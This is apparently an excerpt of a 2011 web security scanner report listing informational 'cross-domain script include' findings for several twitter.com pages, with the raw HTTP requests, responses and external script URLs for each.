X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.393. http://twitter.com/account/complete previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/account/complete

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225098-32422-55297
ETag: "7a8adef0dbc3ef0c42eb7b03abd1a754"
Last-Modified: Fri, 28 Jan 2011 14:31:38 GMT
X-Runtime: 0.02921
Content-Type: text/html; charset=utf-8
Content-Length: 9562
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlMzVkMjBkODc1ZGM5ZGI5Nzg4YmNiMWM0MDIyZjk3%250AMTg6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--2bce05f22e5c92b42da6ed23c2bbac492123e41a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.394. http://twitter.com/account/complete previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/account/complete

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224738-66922-55667
ETag: "eedf9b80f78cbd1a5f2a1c6e52bbc763"
Last-Modified: Fri, 28 Jan 2011 14:25:38 GMT
X-Runtime: 0.03729
Content-Type: text/html; charset=utf-8
Content-Length: 9562
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlODI5MmUyYjNjZTVmMGNlMzU4NGJlM2JjNGVkMTQ1%250AYTA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--9ac191e704e10670dc258c58c1b2e5f1e8b10885; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.395. http://twitter.com/account/resend_password previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/account/resend_password

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /account/resend_password HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224738-99420-18584
ETag: "f922c6202d9a9e6c0d31ac6afdb14eff"
Last-Modified: Fri, 28 Jan 2011 14:25:38 GMT
X-Runtime: 0.02589
Content-Type: text/html; charset=utf-8
Content-Length: 9745
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlMDI3MTAzYTcyMjcyM2VhZDQyN2NiOGRlNTEyNWE5%250AZTc6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--c7b8267380c61b856a14710cd449961d09a51a3c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.396. http://twitter.com/account/resend_password previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/account/resend_password

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /account/resend_password HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234373-64080-16855
ETag: "b02fad5237a5af47e0588230109bbf33"
Last-Modified: Fri, 28 Jan 2011 17:06:13 GMT
X-Runtime: 0.02076
Content-Type: text/html; charset=utf-8
Content-Length: 9614
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.397. http://twitter.com/account/resend_password previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/account/resend_password

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /account/resend_password HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225097-35641-62367
ETag: "36c3d8393c36beacce84d1f0e053aae1"
Last-Modified: Fri, 28 Jan 2011 14:31:37 GMT
X-Runtime: 0.01483
Content-Type: text/html; charset=utf-8
Content-Length: 9745
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlMmIzZDhkNWIzZmNkZjJmZDVkZmM4Zjg1MzRlMjAx%250ANGU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--aa38ccbd7b634a31265b6d55953168e34206df29; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.398. http://twitter.com/ajpiano previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ajpiano

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-9839-24776
ETag: "6cfb51a84c8ef82cfc30accecbfd12df"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01348
Content-Type: text/html; charset=utf-8
Content-Length: 48953
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.399. http://twitter.com/androidnewsblog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/androidnewsblog

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-13968-5956
ETag: "b0e4ae48560abd6de3188c44a0de9618"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01122
Content-Type: text/html; charset=utf-8
Content-Length: 49638
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.400. http://twitter.com/backstreetboys previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/backstreetboys

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/api.js?1296246715
http://a0.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296246715
http://a1.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296246715
http://a1.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296246715
http://a2.twimg.com/a/1296245718/javascripts/dismissable.js?1296246715
http://a2.twimg.com/a/1296245718/javascripts/twitter.js?1296246715
http://a3.twimg.com/a/1296245718/javascripts/geov1.js?1296246715
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265308-18449-44248
ETag: "470b046c74671df35cc91c1d8792ddb5"
Last-Modified: Sat, 29 Jan 2011 01:41:48 GMT
X-Runtime: 0.01227
Content-Type: text/html; charset=utf-8
Content-Length: 47038
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/twitter.js?1296246715" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296246715" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296246715" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296246715" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/geov1.js?1296246715" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/api.js?1296246715" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296246715" type="text/javascript"></script>
